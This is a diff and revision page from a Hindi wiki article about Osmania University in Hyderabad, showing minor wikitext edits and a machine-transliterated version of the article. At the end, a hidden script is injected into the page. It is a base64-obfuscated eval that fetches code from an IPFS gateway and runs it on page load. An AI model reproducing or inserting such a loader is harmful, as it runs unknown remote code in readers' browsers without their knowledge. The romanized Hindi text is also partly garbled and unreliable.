Difference between revisions of "उस्मानिया विश्वविद्यालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[चित्र:Osmania-University-Hyderabad.jpg|thumb|250px|उस्मानिया विश्वविद्यालय, [[हैदराबाद]]]]
 
[[चित्र:Osmania-University-Hyderabad.jpg|thumb|250px|उस्मानिया विश्वविद्यालय, [[हैदराबाद]]]]
 
'''उस्मानिया विश्वविद्यालय''' [[आंध्र प्रदेश]] की राजधानी [[हैदराबाद]] में महत्त्वपूर्ण शिक्षा केंद्रों में से एक है।  
 
'''उस्मानिया विश्वविद्यालय''' [[आंध्र प्रदेश]] की राजधानी [[हैदराबाद]] में महत्त्वपूर्ण शिक्षा केंद्रों में से एक है।  
*हैदराबाद के आखिरी निज़ाम और मीर उस्मान अली खान ने सन [[1918]] में उस्मानिया विश्वविद्यालय का निर्माण करवाया था।
+
*हैदराबाद के आखिरी निज़ाम और [[उस्मान अली|मीर उस्मान अली खान]] ने सन [[1918]] में उस्मानिया विश्वविद्यालय का निर्माण करवाया था।
 
*यह विश्वविद्यालय [[भारत]] के पुराने विश्वविद्यालयों में से एक है।
 
*यह विश्वविद्यालय [[भारत]] के पुराने विश्वविद्यालयों में से एक है।
 
*यहाँ लगभग 3 लाख छात्र और छात्राएँ शिक्षा का अध्यन करते है और यह विश्वविद्यालय लगभग 1600 एकड़ में फैला हुआ है।   
 
*यहाँ लगभग 3 लाख छात्र और छात्राएँ शिक्षा का अध्यन करते है और यह विश्वविद्यालय लगभग 1600 एकड़ में फैला हुआ है।   
Line 11: Line 10:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
[http://www.osmania.ac.in/ उस्मानिया विश्वविद्यालय]
+
*[http://www.osmania.ac.in/ उस्मानिया विश्वविद्यालय]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विश्वविद्यालय}}
 
{{विश्वविद्यालय}}
Line 21: Line 19:
 
[[Category:विश्वविद्यालय]]  
 
[[Category:विश्वविद्यालय]]  
 
[[Category:हैदराबाद]]
 
[[Category:हैदराबाद]]
[[Category:राष्ट्रीय_शिक्षण_संस्थान]]
+
[[Category:राष्ट्रीय शिक्षण संस्थान]]
 
[[Category:शिक्षा कोश]]  
 
[[Category:शिक्षा कोश]]  
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 14:28, 28 October 2014

[[chitr:Osmania-University-Hyderabad.jpg|thumb|250px|usmaniya vishvavidyalay, haidarabad]] usmaniya vishvavidyalay aandhr pradesh ki rajadhani haidarabad mean mahattvapoorn shiksha keandroan mean se ek hai.

  • haidarabad ke akhiri nizam aur mir usman ali khan ne san 1918 mean usmaniya vishvavidyalay ka nirman karavaya tha.
  • yah vishvavidyalay bharat ke purane vishvavidyalayoan mean se ek hai.
  • yahaan lagabhag 3 lakh chhatr aur chhatraean shiksha ka adhyan karate hai aur yah vishvavidyalay lagabhag 1600 ek d mean phaila hua hai.
  • usmaniya vishvavidyalay uchch nyayalay, siti k aaulej aur moosa nadi ke kinare phaile pablik udyanoan se ghira hai.
  • is vishvavidyalay hiandoo aur muslim sthapaty kala shaili ka mishran hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>